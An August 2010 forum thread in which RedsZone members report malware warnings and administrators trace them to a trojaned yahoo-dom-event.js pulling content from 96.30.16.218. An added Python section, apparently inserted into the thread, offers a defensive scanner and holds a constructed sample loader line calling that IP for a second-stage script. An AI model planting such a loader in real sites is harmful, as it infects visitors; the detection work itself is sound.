Spyware/Malware


Cyclone792
08-02-2010, 08:20 AM
Is anybody else getting hit with any Spyware or Malware from RZ? I'm not 100 percent confident this has come from RZ - and I'm far from a computer expert - but I've gotten trojan flags both last night on the home PC and again this morning on the work PC immediately when visiting RZ.

This is the alert that popped up this morning as soon as RZ loaded:

http://img834.imageshack.us/img834/6165/rzaugust22010.jpg

Any ideas?

_Sir_Charles_
08-02-2010, 11:25 AM
I've gotten a few in the last couple days too.

Mine says "an intrusion attempt was blocked"
it's a "MSIE Java deployment toolkit input invalidation"

Seems to occur during a search routine.

Boss-Hog
08-02-2010, 11:47 AM
I'll pass this along to our host...thank you.

nysupport
08-02-2010, 12:06 PM
Any particular page you're visiting when you get these messages?

I'm not seeing anything "typical" - but if you can tell me where you were, that would help me track it down.

Thanks

Joe

Cyclone792
08-02-2010, 12:10 PM
Mine was the main page itself immediately after it loaded: http://www.redszone.com/forums/index.php

Nothing has popped up in the last few hours though.

nysupport
08-02-2010, 12:18 PM
I'm wondering if maybe it was an infected Google ad; there's nothing to indicate a compromise in the code at all, from what I'm seeing, but I'll keep looking.

The latest version of this software available is 4.0.5.

Current version is 3.8.6 - it might be time to upgrade, or evaluate the upgrade options

swaisuc
08-02-2010, 02:30 PM
Not much to add, but I got this exact same message the first time I visited the main page today.

nysupport
08-02-2010, 02:32 PM
If anyone encounters this again, please do a screen capture if possible, note the page you were on when it happened, and the approximate time (with time zone).

Email to: mobileterminal@gmail.com

Thanks

Boss-Hog
08-02-2010, 04:50 PM
Joe,

One thing I've noticed when loading any page on redszone.com within the past day or so: it seems to be routing through a numerical IP address: 96.30.16.218. I don't ever remember seeing this before. Did we recently move to a different server or what would account for this?

nysupport
08-02-2010, 04:58 PM
Your server IP is 64.128.190.227

That IP (96.30.16.218) is not even owned by us:

NameServer: NS2.WIREDTREE.COM
NameServer: NS1.WIREDTREE.COM
RegDate: 2008-12-03
Updated: 2009-10-29
Ref: http://whois.arin.net/rest/net/NET-96-30-0-0-1

OrgName: Cogswell Enterprises Inc.
OrgId: COGSW
Address: 53 W Jackson Blvd.
Address: Suite 635
City: Chicago

http://www.wiredtree.com/

Not sure where you'd be seeing that

nysupport
08-02-2010, 05:00 PM
Joe,

One thing I've noticed when loading any page on redszone.com within the past day or so: it seems to be routing through a numerical IP address: 96.30.16.218. I don't ever remember seeing this before. Did we recently move to a different server or what would account for this?


Have you done an adware/malware scan on your computer? I can't imagine where that'd be coming from

Boss-Hog
08-02-2010, 05:04 PM
Have you done an adware/malware scan on your computer? I can't imagine where that'd be coming from
I'll rescan...thanks.

Kingspoint
08-02-2010, 05:59 PM
I had gotten a Tidserv virus about 10 days ago. I was able to get rid of it with "tdsskiller" (though the computer's now slow and I'm slowly fixing those problems). It's a rootkit virus that attacks anti-virus software at first so that you can't use antivirus software (then it attacks .dll files, the desktop, the registry, and it hides itself so that even if you use an antivirus software on a hard media it won't find it). It first came around about December of 2008, but it's had a huge re-appearance since June. It's really nasty and destroys everything.

I thought maybe I had gotten it from one of the "forum" sites I visited... Bengals Jungle, this one... or maybe Rotoworld, but I actually believe it came through "Google Images", as Google had just changed their "images" format, and it occurred immediately after I had looked up something there. I figured Google had a hole in it that was discovered by the hackers. The hackers come from China on this particular "tidserv" virus.

KoryMac5
08-02-2010, 10:54 PM
Got a virus message on the wife's laptop as well. I will try and screen save it the next time it pops up. Usually happens when I enter via the main page. The laptop has come across it three times in the past few days.

Boss-Hog
08-02-2010, 10:56 PM
All,

Based on a recommendation from vBulletin, I've temporarily disabled all Google ads. Please reply to this thread immediately if you receive another virus/malware alert.

Boss-Hog
08-02-2010, 11:08 PM
I'll rescan...thanks.
Well, I ran scans using the latest definitions from several programs and found nothing that accounts for this. I confirmed that it only happens with vBulletin, as other areas of the site and external sites do not call the address I mentioned. I disabled the ads and all other custom vBulletin code and the site is still accessed, at least for me, whenever any vBulletin page loads. Does anyone else have this issue and/or know how to fix it?

toledodan
08-02-2010, 11:34 PM
Java tries to load up on me when I open the main page sometimes.

Boss-Hog
08-02-2010, 11:36 PM
Within the past 20 minutes since the ads have been disabled?

toledodan
08-02-2010, 11:39 PM
Within the past 20 minutes since the ads have been disabled?

Yep. It tries to load but comes up as an error. Not sure what that is.

Boss-Hog
08-03-2010, 07:07 AM
Can you guys please clear your cookies (at least for this site) and try again? Please let me know...

Cyclone792
08-03-2010, 09:12 AM
Just got another trojan alert this morning at 9:10am eastern time as soon as I loaded up this Sun Deck thread: http://www.redszone.com/forums/showthread.php?t=84230. The alert is the identical alert that I posted in the original post of this thread.

bigredmechanism
08-03-2010, 11:40 AM
Every time I load a page, avast is telling me "threat detected."

edit: clientscript/yui/yahoo-dom-even is the location that it's giving me. Hope that helps.

flyersbaseball
08-03-2010, 11:51 AM
I continue to get these as well

Boss-Hog
08-03-2010, 11:52 AM
I'm working on getting it resolved with our host and vBulletin...please continue to post any new information and thanks for your patience.

CTA513
08-03-2010, 01:34 PM
When I came here today Avast told me this malware had been blocked:

http://www.redszone.com/forums/clientscript/yui/yahoo-dom-event/yahoo-dom-event.js?v=386|>{gzip}

CrackerJack
08-03-2010, 01:39 PM
I am still getting malware/spyware alerts as well via Avast, same as CTA mentioned.

Ron Madden
08-03-2010, 03:11 PM
Every time I load a page, avast is telling me "threat detected."

Same here. Keep getting a Malware Blocked

writerdan33
08-03-2010, 03:17 PM
Every page I load on this site, no matter the computer, has the malware warning from Avast.

Roy Tucker
08-03-2010, 03:20 PM
logging into RedsZone, I continue to get a Java Virtual Machine Launcher which logs:

"Unable to access jarfile \\109.236.81.40\public\public\calc.jar"

A google search on this string shows this: http://jsunpack.jeek.org/dec/go?report=1ec9b510fa8ece79e1cde50102d3e3ab1a207f7f

Lockdwn11
08-03-2010, 04:51 PM
Every time I load a page, avast is telling me "threat detected."

edit: clientscript/yui/yahoo-dom-even is the location that it's giving me. Hope that helps.

I'm getting the same thing

CrackerJack
08-03-2010, 05:01 PM
Cleared my cookies, restarted browser, am still getting the Malware warning every time I click on a link in the forums, or when I load up Redszone.com.

Hitting "abort connection" in Avast lets me continue unharmed.


http://www.redszone.com/forums/clientscript/yui/yahoo-dom-event/yahoo-dom-event.js?v=386\{gzip}

Boss-Hog
08-03-2010, 06:14 PM
All,

I believe I've solved the problem - can you please give it another try?

Lockdwn11
08-03-2010, 06:19 PM
Problem fixed on my computer. Can you tell us what the problem was?

CrackerJack
08-03-2010, 06:23 PM
So far, so good, no more warnings - thanks.

Boss-Hog
08-03-2010, 06:26 PM
Problem fixed on my computer. Can you tell us what the problem was?
Somehow, we had a trojan horse(s) on the server - the above posts helped me locate and delete it. Thanks for everyone's help and patience.
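The check an admin in this position would want is not part of the thread or of vBulletin; it is added here as a worked example. It walks a web root, hashes every .js file against a manifest of pristine vendor copies (the kind of file the reports above name, clientscript/yui/yahoo-dom-event/yahoo-dom-event.js, is exactly what a known-good hash should catch), and flags any script text that embeds a URL whose host is a bare IPv4 literal, since the warnings quoted later in the thread point at 96.30.16.218. The sample web root, the stand-in file contents, the 'x.js' path and the manifest format are all constructed for the demonstration; only the IP and the file path come from the posts.

```python
"""Triage check for injected loaders in a site's JavaScript (added example, not from the thread).

Two signals the thread's reports point at:
  1. a vendor file (clientscript/yui/.../yahoo-dom-event.js) whose hash no longer matches
     the pristine copy shipped by vBulletin, and
  2. script text containing a URL whose host is a bare IPv4 literal (96.30.16.218 here).
"""
import hashlib
import os
import re
import tempfile

# A URL with a bare IPv4 host: "http://96.30.16.218/x.js", "//10.0.0.5:8080/a.js".
# Matching the URL rather than a <script> tag also catches loaders that split the
# tag name ('<scr'+'ipt') to dodge naive signature checks.
IP_URL_RE = re.compile(
    r'(?:https?:)?//(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?(?:/[^\s"\'<>()]*)?'
)


def find_ip_references(text):
    """Return (ip, url) pairs for every bare-IP URL found in a blob of JS/HTML."""
    return [(m.group(1), m.group(0)) for m in IP_URL_RE.finditer(text)]


def scan_js_file(path, expected_sha256=None):
    """Hash one file against its known-good digest (if any) and look for bare-IP URLs."""
    with open(path, 'rb') as f:
        data = f.read()
    digest = hashlib.sha256(data).hexdigest()
    refs = find_ip_references(data.decode('utf-8', errors='replace'))
    modified = expected_sha256 is not None and expected_sha256 != digest
    return {
        'path': path,
        'sha256': digest,
        'modified': modified,        # differs from the pristine vendor copy
        'ip_refs': refs,             # bare-IP URLs embedded in the script
        'suspicious': modified or bool(refs),
    }


def scan_webroot(root, known_hashes):
    """Walk root and return findings for every suspicious .js file.

    known_hashes maps a relative path (forward slashes) to the SHA-256 of the
    pristine file, e.g. computed from the vendor's own distribution archive.
    Files absent from the manifest are still checked for bare-IP URLs.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith('.js'):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, '/')
            result = scan_js_file(full, known_hashes.get(rel))
            result['rel'] = rel
            if result['suspicious']:
                findings.append(result)
    return sorted(findings, key=lambda r: r['rel'])


# Constructed sample content (stand-ins, not the real vBulletin/YUI sources).
CLEAN_GLOBAL = b"/* vbulletin_global.js stand-in (constructed) */\nfunction vb_init() { return true; }\n"
CLEAN_YUI = b"/* yahoo-dom-event.js stand-in (constructed) */\nvar YAHOO = YAHOO || {};\nYAHOO.util = {Dom: {}, Event: {}};\n"
# Injection modelled on the thread's report: a loader appended to the YUI file that
# pulls a second-stage script from the bare IP 96.30.16.218 ('x.js' is invented).
INJECTED_YUI = CLEAN_YUI + (
    b"\ndocument.write('<scr'+'ipt src=\"http://96.30.16.218/x.js\"></scr'+'ipt>');\n"
)


def build_sample_site():
    """Create a throwaway web root with one pristine and one trojaned file.

    Returns (root, manifest); the manifest holds the hashes of the pristine copies,
    so the trojaned yahoo-dom-event.js mismatches it as it would in a real check.
    """
    root = tempfile.mkdtemp(prefix='webroot_')
    on_disk = {
        'clientscript/vbulletin_global.js': CLEAN_GLOBAL,
        'clientscript/yui/yahoo-dom-event/yahoo-dom-event.js': INJECTED_YUI,
    }
    pristine = {
        'clientscript/vbulletin_global.js': CLEAN_GLOBAL,
        'clientscript/yui/yahoo-dom-event/yahoo-dom-event.js': CLEAN_YUI,
    }
    for rel, data in on_disk.items():
        full = os.path.join(root, *rel.split('/'))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, 'wb') as f:
            f.write(data)
    manifest = {rel: hashlib.sha256(data).hexdigest() for rel, data in pristine.items()}
    return root, manifest


if __name__ == '__main__':
    site_root, site_manifest = build_sample_site()
    for hit in scan_webroot(site_root, site_manifest):
        urls = [url for _ip, url in hit['ip_refs']]
        print(f"{hit['rel']}: modified={hit['modified']} bare-IP urls={urls}")
```

The hash comparison is the reliable signal: a vendor script that differs from the copy in the vendor's own archive has been changed, whatever the change looks like. The bare-IP match is only a triage hint (a comment such as `//1.2.3.4` would also trip it), which is why the two are reported separately; deleting a flagged file without also finding how it was written (the host's logs, as nysupport asks for further down) tends to end the way the rest of this thread does, with the warnings coming back.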

RBA
08-03-2010, 06:33 PM
Your server IP is 64.128.190.227

That IP (96.30.16.218) is not even owned by us:

NameServer: NS2.WIREDTREE.COM
NameServer: NS1.WIREDTREE.COM
RegDate: 2008-12-03
Updated: 2009-10-29
Ref: http://whois.arin.net/rest/net/NET-96-30-0-0-1

OrgName: Cogswell Enterprises Inc.
OrgId: COGSW
Address: 53 W Jackson Blvd.
Address: Suite 635
City: Chicago

http://www.wiredtree.com/

Not sure where you'd be seeing that

Mr Spacely will be mad that Jetson let Cogswell intrude on Spacely Spocket's web server.

CTA513
08-03-2010, 06:42 PM
All,

I believe I've solved the problem - can you please give it another try?

The site is working fine for me now.

Cyclone792
08-03-2010, 07:44 PM
My latest Malwarebyte scan tonight came up clean, and the site does seem to be running a bit quicker tonight than it had been in previous days. Looks like everything is good to go now on my end so far.

Reds Fanatic
08-03-2010, 08:51 PM
Definitely running quicker tonight. The one thing I have noticed, and this may not be related, but it looks like the live updates are not really working tonight to automatically refresh threads.

Boss-Hog
08-03-2010, 09:02 PM
Definitely running quicker tonight. The one thing I have noticed, and this may not be related, but it looks like the live updates are not really working tonight to automatically refresh threads.
Thanks for letting me know - it should be working again.

bigredmechanism
08-04-2010, 12:26 AM
I posted earlier today getting the warnings. Everything seems okay and pretty responsive.

Thanks for the quick actions bh.

nysupport
08-04-2010, 12:32 AM
Ok, very weird.

I had a subscription to this thread, it's gone. I hadn't seen any replies in my email, figured there was no further issue; lo and behold, two new pages.

So Boss, it was a corrupted JavaScript file? Can you email me the details (file name, etc.) and I can look through the logs to see how it got there. This really has me wondering.

Ron Madden
08-04-2010, 04:09 AM
All,

I believe I've solved the problem - can you please give it another try?



Good Job, Thanks Boss. :thumbup:

reds1869
08-04-2010, 12:38 PM
Google Chrome has just started giving me a malware warning when I load the page. I've had that happen on several other forums in the past. I'll keep trying and let you know if the problem continues.

Edit: I'm running Chrome on Mac OS 10.5.8. I am not getting the warning with Safari or Opera.

FutureRedsGM
08-04-2010, 12:57 PM
Google Chrome has just started giving me a malware warning when I load the page. I've had that happen on several other forums in the past. I'll keep trying and let you know if the problem continues.

Edit: I'm running Chrome on Mac OS 10.5.8. I am not getting the warning with Safari or Opera.

I'm getting the same warning using Google Chrome on Windows Vista.


Warning: Visiting this site may harm your computer!
The website at www.redszone.com contains elements from the site 96.30.16.218, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for 96.30.16.218.

RedsManRick
08-04-2010, 01:04 PM
I've just had the same experience on Chrome on my Mac.

The website at www.redszone.com contains elements from the site 96.30.16.218, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for 96.30.16.218.
Learn more about how to protect yourself from harmful software online.

Interestingly, it does not happen when using an "Incognito" window. Perhaps it's a malicious cookie from an ad?

TRF
08-04-2010, 02:18 PM
I've just had the same experience on Chrome on my Mac.

The website at www.redszone.com contains elements from the site 96.30.16.218, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for 96.30.16.218.
Learn more about how to protect yourself from harmful software online.

Interestingly, it does not happen when using an "Incognito" window. Perhaps it's a malicious cookie from an ad?

I just got the same thing, Chrome on Windows7.

Definitely agree with the cookie idea.

Boss-Hog
08-04-2010, 05:05 PM
I turned Google ads temporarily off again - can you Chrome users clear your cookies for this site and let me know if you still get that message? That will allow us to pinpoint if it's the ads or not.

reds1869
08-04-2010, 05:10 PM
I turned Google ads temporarily off again - can you Chrome users clear your cookies for this site and let me know if you still get that message? That will allow us to pinpoint if it's the ads or not.

I cleared my cookies from RedsZone and am no longer getting the message. Thanks!

pahster
08-04-2010, 05:47 PM
I turned Google ads temporarily off again - can you Chrome users clear your cookies for this site and let me know if you still get that message? That will allow us to pinpoint if it's the ads or not.

I cleared my cookies and I'm still getting the warning.

Boss-Hog
08-04-2010, 05:59 PM
Very bizarre - I just downloaded Chrome, fired up RZ and did not get any warnings. Could those of you who are maybe restart your PCs and see if you still are? If you still are, what page(s) are you visiting when the warning comes up - all?

pahster
08-04-2010, 06:47 PM
Very bizarre - I just downloaded Chrome, fired up RZ and did not get any warnings. Could those of you who are maybe restart your PCs and see if you still are? If you still are, what page(s) are you visiting when the warning comes up - all?

I only see it when I load the main page.

TRF
08-04-2010, 07:00 PM
I only saw it the one time, and only in Chrome. Hasn't happened since.

nate
08-04-2010, 07:18 PM
I tried Chrome (I don't use it much and hadn't started it in months) on the Mac and receive no warnings or alerts.

Boss-Hog
08-04-2010, 09:10 PM
I can't replicate it using Chrome with or without Google AdSense turned on. Please let me know if any of you continue to see it and where, as well as any other pertinent information. Thanks.

ABEsolutely
08-05-2010, 06:31 AM
I received this warning from chrome for the first time this morning off a fresh boot of my PC. It was right at the main page load. I also received the warning again when I clicked on the latest updated thread in ORG.

writerdan33
08-06-2010, 03:20 PM
Still getting it every time I go anywhere on the site.

yab1112
08-06-2010, 03:41 PM
I still get it every time I load the main page. For the first time today, I also got it when I opened a thread in tORG.

Boss-Hog
08-06-2010, 03:58 PM
Still getting it every time I go anywhere on the site.

What browser are you and yab1112 each using?

Sent from my DROIDX using Tapatalk

Kingspoint
08-06-2010, 06:19 PM
I find it scary that at the bottom of this thread are two "malware" ads by Google.

BTW, I use google chrome and XP HE, but ceased getting any malware warnings after I used tdsskiller two weeks ago.

yab1112
08-06-2010, 06:41 PM
What browser are you and yab1112 each using?

Sent from my DROIDX using Tapatalk

I'm using Chrome. I tried in Firefox just to see what would happen and it worked fine.

pahster
08-06-2010, 10:13 PM
I'm still occasionally getting a malware warning from the main page. I also just got one when I tried to open this thread.

TylerScottDavis
08-06-2010, 10:46 PM
I just got it for the first time while using IE. Avast picked it up.

C:\Users\Davis\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\MF1K6860\yahoo-dom-event[1].js [L] HTML:Script-inf (0)
File was successfully moved to chest...

this was the specific file: yahoo-dom-event[1].js

Sorry if anything I just posted is redundant, I didn't bother reading through most of this thread.

Boss-Hog
08-07-2010, 01:46 AM
I contacted our host to request a virus/malware scan be run on our server and I'm waiting to hear back, so the ball is in his court. Thanks for everyone's help.

jmcclain19
08-07-2010, 03:51 PM
Boss I got the following warnings when just opening up RZ in Google Chrome - typically I use tapatalk from my iPhone but today I'm using my home computer.

I've cleared cookies & restarted and am still getting the warning.


Warning: Visiting this site may harm your computer!
The website at www.redszone.com contains elements from the site 96.30.16.218, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for 96.30.16.218.
Learn more about how to protect yourself from harmful software online.

I followed the Google Diagnostic page - here is what it lists

Safe Browsing
Diagnostic page for 96.30.16.0

What is the current listing status for 96.30.16.0?
This site is not currently listed as suspicious.

Part of this site was listed for suspicious activity 1 time(s) over the past 90 days.

What happened when Google visited this site?
Of the 9 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-08-06, and the last time suspicious content was found on this site was on 2010-08-06.
Malicious software includes 32 exploit(s), 14 trojan(s).

This site was hosted on 1 network(s) including AS19066 (WIREDTREE).

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, 96.30.16.0 appeared to function as an intermediary for the infection of 2 site(s) including full18.com/, yellowbullet.com/.

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 15 domain(s), including buildtutorial.com/, full18.com/, yellowbullet.com/.

Next steps:
Return to the previous page.
If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.

yab1112
08-07-2010, 05:14 PM
Today I am not getting the warning. Everything appears to be fine.

Boss-Hog
08-07-2010, 06:52 PM
This is beyond bizarre...either I didn't remove all traces of the problem initially or it's come back to bite us. I'm still doing all that I can to address the problem.

Boss-Hog
08-07-2010, 07:32 PM
All,

Our host identified one problem, which I addressed - those of you that have been receiving the malware warning(s), can you please clear your RedsZone cookies and try again? Thanks.

GAC
08-08-2010, 07:05 AM
I'm getting the same warning using Google Chrome on Windows Vista.


Warning: Visiting this site may harm your computer!
The website at www.redszone.com contains elements from the site 96.30.16.218, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for 96.30.16.218.

I'm getting the same thing.

Boss-Hog
08-08-2010, 09:30 AM
I'm getting the same thing.
I disabled all our custom add-ons and Google AdSense...can you try again and let me know? This would be a lot easier to diagnose if I could reproduce the problem on my end...

ochre
08-08-2010, 10:12 AM
GAC says he is getting:

GAC, you do not have permission to access this page. This could be due to one of several reasons:

Your user account may not have sufficient privileges to access this page. Are you trying to edit someone else's post, access administrative features or some other privileged system?
If you are trying to post, the administrator may have disabled your account, or it may be awaiting activation.
when he tries to post.

Boss-Hog
08-08-2010, 10:18 AM
It looks like he recently tried to change his email address without clicking on the confirmation code...I went ahead and took care of it, so he should be good to go now.

GAC
08-08-2010, 10:46 AM
I tried to edit my previous post earlier, and say that I got it corrected by following your instruction of clearing cookies, but all of a sudden was getting this message:


GAC, you do not have permission to access this page. This could be due to one of several reasons:

Your user account may not have sufficient privileges to access this page. Are you trying to edit someone else's post, access administrative features or some other privileged system?
If you are trying to post, the administrator may have disabled your account, or it may be awaiting activation.

which wouldn't allow me to do anything, even PM you, other than log in.

I'm assuming you got RedsBaron's PM this morning alerting you to my situation and got it corrected? Because obviously I'm now able to post/reply. LOL

But as of right now all is hunky dory.

GAC
08-08-2010, 10:58 AM
ochre just informed me it may have been due to the fact I updated my email in the User CP. While there this morning, trying to find out how to clear cookies for RZ, I noticed it had a really old email, so I updated it. Didn't know, or see, a confirmation button, but only a "save changes" button, which I clicked and it said it successfully changed it.

All is well now.

Thanks Boss, ochre, and RB.

Ron Madden
08-08-2010, 06:26 PM
ochre just informed me it may have been due to the fact I updated my email in the User CP. While there this morning, trying to find out how to clear cookies for RZ, I noticed it had a really old email, so I updated it. Didn't know, or see, a confirmation button, but only a "save changes" button, which I clicked and it said it successfully changed it.

All is well now.

Thanks Boss, ochre, and RB.

I'm not getting the warning anymore.

How do I clear cookies for RZ?

Boss-Hog
08-08-2010, 08:47 PM
You may clear all your cookies by clicking here (http://www.redszone.com/forums/login.php?do=logout&logouthash=1281314865-ef1e8364d12dc7adb045315bf8bbd9cdb32e0f0e). If you return to the main index page via the link provided and you are still logged in, you may have to remove your cookies manually.

In Internet Explorer 6 on Windows XP:

1. Click the "Tools" menu.
2. Select "Internet Options" from the menu that appears.
3. Click "Delete Cookies" on the dialog box that appears. It will be in the center area of the "General" tab.

In Mozilla Firefox:

1. Click the "Tools" menu.
2. Select "Options" from the menu that appears.
3. From the dialog box, select "Privacy" on the left.
4. Find "Cookies" on the main pane, and click the "Clear" button adjacent to it.

Your cookies should now be removed. You may want to restart the computer and revisit the forums to be sure.

RedsMan3203
08-08-2010, 08:50 PM
Boss - I run Google Chrome, been running it all season with 0 issues.

I haven't came across any warnings about Spyware/Malware when going to the site.

Just an FYI

Boss-Hog
08-09-2010, 07:01 AM
OK, I re-enabled the custom add-ons (Chat, Live Topic, etc.) but kept Google AdSense off. Can someone that has had the problem let me know if they still see it? Unfortunately, we're going to have to keep doing this trial and error until I find the culprit since I can't reproduce the issue on my end.

Chip R
08-09-2010, 11:53 AM
OK, I re-enabled the custom add-ons (Chat, Live Topic, etc.) but kept Google AdSense off. Can someone that has had the problem let me know if they still see it? Unfortunately, we're going to have to keep doing this trial and error until I find the culprit since I can't reproduce the issue on my end.


I cleared my cookies last night on my home computer (I use Chrome) and it was OK.

Boss-Hog
08-09-2010, 12:07 PM
I cleared my cookies last night on my home computer (I use Chrome) and it was OK.
Can you give it another try ASAP now that the custom add-ons are back on (though AdSense is still off) and let me know?

Chip R
08-09-2010, 01:55 PM
Can you give it another try ASAP now that the custom add-ons are back on (though AdSense is still off) and let me know?

I'll let you know when I get home tonight.

GAC
08-09-2010, 04:55 PM
I cleared my cookies last night on my home computer

:ughmamoru

TRF
08-09-2010, 05:26 PM
I only got it one time, with chrome on windows7.

hadn't seen it before, haven't seen it since.

Boss-Hog
08-09-2010, 06:12 PM
I only got it one time, with chrome on windows7.

hadn't seen it before, haven't seen it since.
You got it at the time you made your post?

Chip R
08-09-2010, 06:55 PM
Everything's looking good at home, Boss.

TRF
08-09-2010, 07:52 PM
You got it at the time you made your post?

yep, my first one in this thread. hasn't happened since.

hebroncougar
08-09-2010, 10:04 PM
Man... I'm glad I read this thread. This site and a few others have been painfully slow for the past week or so for me. Cleared my cookies, downloaded Avast, and it's working fine now.

Boss-Hog
08-10-2010, 07:03 AM
yep, my first one in this thread. hasn't happened since.
That's extremely strange - the fact that you got it after I disabled all AdSense tells me the problem is not resolved. What I don't understand is 1). why I can't reproduce it using Chrome (and why only Chrome users seem to get the message) and 2). why it sporadically appears. I'll do some additional checking with vBulletin and see what I can find.

Boss-Hog
08-12-2010, 11:52 AM
Is this currently still an issue for anyone?

RBA
08-12-2010, 12:08 PM
I was browsing the Sundeck forum and something hijacked my browser and took me to the old Cincinnati Enquirer Reds Talk forums where anything goes with moaning and groaning and personal attacks. Looks like the malware/virus was also spreading to the Old Red Guard. I think it's under control right now, but I get the occasional reroute once in awhile.